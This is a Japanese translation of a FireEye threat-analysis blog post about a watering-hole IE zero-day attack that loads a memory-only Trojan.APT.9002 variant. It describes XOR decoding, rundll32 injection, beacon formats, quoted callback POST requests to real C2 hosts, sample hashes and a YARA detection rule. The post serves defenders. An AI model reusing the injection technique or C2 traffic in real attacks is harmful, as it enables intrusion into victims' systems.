オペレーション Ephemeral Hydra: オペレーションDeputy Dogとの関連性を示唆する、 IEを狙ったゼロデイ攻撃

FireEyeは先ごろ、Internet Explorer(IE)のゼロデイ脆弱性を悪用する新たなエクスプロイトがWebサイト経由のサイバー攻撃で使用されている事実を確認しました。攻撃者は、国家や多国間の安全保障政策に関心のある人物がアクセスするWebサイトを意図的に選び、ゼロデイ・エクスプロイトを埋め込んでいました。FireEyeは、この攻撃と「 オペレーション DeputyDog 」と呼ぶ攻撃で使用されているインフラストラクチャの間に存在する関連性を確認しています。またこの攻撃には、多くのAPT(Advanced Persistent Threat)攻撃とは異なり、攻撃に使用するペイロードをディスクに書き込むことなく直接メモリに読み込むという特徴があります。このため、攻撃を受けたシステムを従来のフォレンジック手法で調査することは非常に困難となっています。

ペイロードはTrojan.APT.9002
2013年11月8日、FireEyeのXiaobo ChenDan Caseldenは、IEのゼロデイ脆弱性を悪用する新たなエクスプロイトについてのブログ記事を投稿しました。このエクスプロイトは、ある特定のユーザー層がアクセスするWebサイトに埋め込まれており、攻撃チェーンも1つのWebサイトで完結しています。つまり、iframeや別のサイトへのリダイレクトを使用せずに、シェルコードのペイロードを取得しているのです。

私たちは、攻撃で使用されているペイロードをFireEye Dynamic Threat Intelligence(DTI)クラウドから入手しました。このペイロードは、DTIクラウドではTrojan.APT.9002(別名Hydraq/McRAT)の亜種として認識されており、メモリ内でのみ実行されます。自身をディスクに書き込まないため、感染マシンには検知の手がかりとなる痕跡がほとんど残りません。

シェルコードであるこのペイロードは、脆弱性の悪用に成功した場合、一連の段階を踏んでデコードされ、直接メモリに挿入されます。「0x9F」をキーにして、ペイロードの1回目のXORデコードが行われた後、rundll32.exeのインスタンスが起動され、CreateProcessA、OpenProcess、VirtualAlloc、WriteProcessMemory、CreateRemoteThreadを使用してペイロードが挿入されます。

Ephemal PR

図1 - 「0x9F」をキーにした、シェルコードの1回目のXORデコード

ephemal PR2

ephenal 10

ephenal 11

図2 - シェルコードがrundll32.exeを起動し、ペイロードを挿入

rundll32.exeに挿入されたペイロードに制御が移った後、シェルコードに対し、さらにもう2回XORデコードが行われます。 1回目のデコードでは「0×01」、2回目のデコードでは「0x6A」がキーに使用されます。

ephenal 12

図3 - 「0×01」をキーにした、シェルコードのXORデコード

Ephemal PR3

図4 - 「0x6A」をキーにした、シェルコードのXORデコード

最後にデコードされたペイロード(Trojan.APT.9002の亜種)にプロセスの実行が移ります。

Ephemal PR4

図5 - 最後にデコードされたペイロードにプロセスの実行が移動

 

攻撃者が攻撃の第1段階で非永続的なペイロードを使用しているのは、自らのリソースとスキルに対する自信の表れに他なりません。この場合、攻撃者が感染マシンを乗っ取り、ネットワーク内に活動を広げるためには、必要な処理を素早く実行する必要に迫られます。感染マシンの乗っ取りに手間取れば、その間にマシンが再起動されるおそれがあり、マシンが再起動されれば、メモリ内に読み込んだTrojan.APT.9002の亜種は自動的に消去されそのマシンを操ることはできなくなるからです。

あるいは、標的のユーザーは繰り返し問題のWebサイトにアクセスするため、いつでも感染させることができるという思惑を抱いているのかもしれません。

攻撃者からの指令に使用されるプロトコルとインフラストラクチャ
この攻撃で使用されているTrojan.APT.9002の亜種は、IPアドレスが111.68.9.93の指令サーバーに443番ポートで接続し、非HTTPプロトコルとHTTP POSTを使用して通信します。亜種が使用するコールバック・ビーコンは、以前の亜種からは変更されています。

以前の亜種では、コールバック・トラフィックのオフセット0の位置に4バイトの静的な識別子が設定されていました。多くの亜種では、「9002」という文字列が識別子に使用されていましたが、「Sunshop」という攻撃キャンペーンで使用されていた亜種のように、別の識別子が使われているケースもあります。

Ephemal PR5

図6 - Trojan.APT.9002の以前の亜種で使用されていたコールバック・ビーコン

一方、今回のゼロデイ攻撃で使用されているディスクに書き込みをしないTrojan.APT.9002のビーコンは、それ以前の亜種とは大きく異なり、動的に変化する4バイトのXORキーを使用してデータを暗号化しています。このキーはオフセット0の位置に置かれており、ビーコンを送信するたびに変化しますFireEyeラボでは、9002の4バイトのXOR版がしばらく前から複数の攻撃者によって使用されている事例を確認していますが、ディスクに書き込みをしないペイロードで使用されていることが確認されたのは今回が初めてです。

Ephemal PR6

図7 - ディスクに書き込みをしないTrojan.APT.9002のペイロードで使用されているコールバック・ビーコンの例

Ephemal PR7

図8 - ディスクに書き込みをしないTrojan.APT.9002のペイロードで使用されているコールバック・ビーコンの例(XORデコード後)

XORデコードされたデータには、オフセット16の位置に必ず「\x09\x12\x11\x20」という静的な値が含まれています。この値は、XORエンコード処理の手前で、パケット・データを構築する関数にハードコードされているものであり、「2011-12-09」という日付を表しているように読めますが、この値にどのような意味があるのかは、現在のところ明らかになっていません。

Ephemal PR8

図9 - パケット・データを構築する関数にハードコードされた値

 

ディスクに書き込みをしないTrojan.APT.9002のペイロードは、POSTリクエストも送信します。このリクエストの内容も以前の亜種から変更されており、静的な文字列「AA」の代わりにBase64のスタブ・データを使用します。 ただし、ユーザー・エージェントの文字列とURIのパターンは変わっていません。ユーザー・エージェントは「lynx」という静的な文字列、URIは増分する16進値となっています。

以前のTrojan.APT.9002 ディスクに書き込みをしないTrojan.APT.9002
POST /4 HTTP/1.1

 

User-Agent: lynx

Host: ieee.boeing-job.com

Content-Length: 2

Connection: Keep-Alive

Cache-Control: no-cacheAA

POST /2 HTTP/1.1

 

User-Agent: lynx

Host: 111.68.9.93:443

Content-Length: 104

Connection: Keep-Alive

Cache-Control: no-cachewUeAKsFHgCrBR4AqwUeAKshVkQrBR4Aqw

UeAKsFHgCrBR4AqwUeAKsFHgCrBR4Aqw

UeAKsFHgCrBR4AqwUeAKsFHgCrBR4AqwUe

AKg==

POSTスタブのデータも4バイトのXORキーで暗号化されています。このデータは、非HTTPのビーコンで使用されているものと同様のデータに復号化され、同じく「\x09\x12\x11\x20」という静的な値を含んでいます。

攻撃キャンペーンの解析
FireEyeでは以前に、同じIPアドレス111.68.9.93に接続する104130d666ab3f640255140007f0b12dというMD5のマルウェア・サンプルを解析しています。

この104130d666ab3f640255140007f0b12dは、90a37e54c53ffb78969644b1a7038e8c、acbc249061a6a2fb09271a68d53567d9、20854f54b0d03118681410245be39bd8と共通の特徴を持っていました。

acbc249061a6a2fb09271a68d53567d9と90a37e54c53ffb78969644b1a7038e8cはどちらもTrojan.APT.9002の亜種であり、IPアドレスが58.64.143.244の指令サーバーに接続します。

20854f54b0d03118681410245be39bd8はTrojan.APT.9002の別の亜種で、ad04.bounceme.netの指令サーバーに接続します。

このドメインに対してパッシブDNS解析を行ったところ、2011年9月23日~2011年10月21日の間は58.64.213.104に解決されていたことが判明しています。このドメイン以外にも、以下のドメインが同じIPアドレスに解決されています。

 

ドメイン

 

 

発見日

 

 

終了日

 

 

dll.freshdns.org

 

 

2011年12月8日

 

 

2012年1月31日

 

 

grado.selfip.com

 

 

2011年12月23日

 

 

2012年1月10日

 

 

usc-data.suroot.com

 

 

2012年2月20日

 

 

2012年2月22日

 

 

usa-mail.scieron.com

 

 

2011年12月1日

 

 

2012年2月22日

 

dll.freshdns.orgというドメインに見覚えがある方もいらっしゃるかもしれません。Internet Explorerの別のゼロデイ脆弱性(CVE-2013-3893)とこの脆弱性を悪用した攻撃キャンペーン「オペレーションDeputyDog」について解説したブログで言及しているとおり、オペレーション DeputyDogのC&Cサーバーは同じドメインdll.freshdns.orgを使用しています。

また興味深いことに、ディスクに書き込みをしないTrojan.APT.9002のペイロードには、「rat_UnInstall」という文字列が含まれています。興味深いというのは、DTIクラウドを使用した調査によって、先に説明した以下のサンプルを含む多数のサンプルにこの文字列が含まれていることが判明しているからです。

104130d666ab3f640255140007f0b12d

90a37e54c53ffb78969644b1a7038e8c

acbc249061a6a2fb09271a68d53567d9

20854f54b0d03118681410245be39bd8

ディスクに書き込みをしないTrojan.APT.9002の亜種を含め、これらのサンプルはすべて、以下の簡単なYARAシグネチャで検知することができます。

rule FE_APT_9002_rat

{

meta:

author = “FireEye Labs”

strings:

$mz = {4d 5a}

$a = “rat_UnInstall” wide ascii

condition:

($mz at 0) and $a

}

また同じく興味深いことに、上で挙げたTrojan.APT.9002のサンプル(ディスクに書き込みをしない亜種を除く)には、以下の文字列も含まれています。

McpRoXy.exe

SoundMax.dll

これらの文字列については、Bit9のブログ記事でも取り上げられています。記事の中で指摘されているように、Trojan.APT.9002(別名Hydraq/McRAT)は攻撃キャンペーン「Operation Aurora」でも使用されており、「rat_UnInstall」という文字列はこのキャンペーンで使用されていたマルウェアのサンプルにも含まれています。つまり、今回の攻撃とOperation Auroraとの関連性を示しているのです。

結論

特定のユーザー層がアクセスするWebサイトにエクスプロイトを埋め込み、ディスクに書き込みをしないペイロードと多層の難読化を駆使するこの攻撃キャンペーンは、非常に高度化されており、容易には検知できません。APT攻撃の実行者は、着実に新しい攻撃手法を編み出し、実戦に投入しています。パッチ未公開の脆弱性を巧みに見つけ出し、ゼロデイ・エクスプロイトを使用した標的型攻撃を執拗に行う彼らは、今後もさらに高度な攻撃を仕掛けてくることでしょう。攻撃者の探究心は、飽くことを知らないようです。

FireEye ラボはこの攻撃を解析するにあたり、iSIGHT Partnersの協力を得ています。

このエントリーは、Ned MoranSai Omkar VashishtMike ScottThoufique Haqによって、エクスプロイト標的型攻撃技術情報脅威情報脆弱性のカテゴリーに投稿されました。ブックマーク用の固定リンクはこちら

本コンテンツは、2013年11月10日(米国時間)にFireEye, Inc.のブログにて公開された内容を翻訳した物です。 本内容は予告なく更新されている可能性があることをご了承ください。

FireEyeについて
FireEye®は、次世代のサイバー攻撃から、世界中の民間企業や官公庁をリアルタイムで防御するために専用設計された、仮想マシンベースのセキュリティ・プラットフォームを発明した企業です。高度なサイバー攻撃は、次世代ファイアウォールやIPS、アンチウイルス、各種ゲートウェイなど、シグネチャベースのセキュリティ対策を容易にすり抜けてしまいます。FireEye®脅威対策プラットフォーム™は、攻撃ライフサイクル全体で、モバイル、Web、電子メール、ファイル・システムといった主要な攻撃経路にわたり、シグネチャを利用しないリアルタイムでダイナミックな脅威防御策を組織へ提供します。FireEyeプラットフォームの核となる仮想実行エンジンは、Dynamic Threat Intelligenceによって補完されており、サイバー攻撃をリアルタイムに検出・防御することができます。FireEyeのソリューションは、世界40か国以上の1,100を超える組織に導入されており、Fortune 500企業の100社以上で利用されています。

FireEyeウェブサイト

FireEyeプラットフォームについて

 

【本件に関するお問合せ先】

ファイア・アイ株式会社

マーケティング・マネージャ

佐藤

TEL:03-4577-4401

Email: akitomo.sato@FireEye.com

【報道関係の方からのお問い合せ先】

FireEye広報事務局

(株式会社トークス内)

担当: 松本

TEL: 03-3556-1225

Email: fireeye@pr-tocs.co.jp

 

# # #

FireEyeはFireEye, Inc.の登録商標です。その他すべてのブランド、製品、またはサービスの名前は、それぞれ該当する所有者の商標またはサービスマークである可能性があります。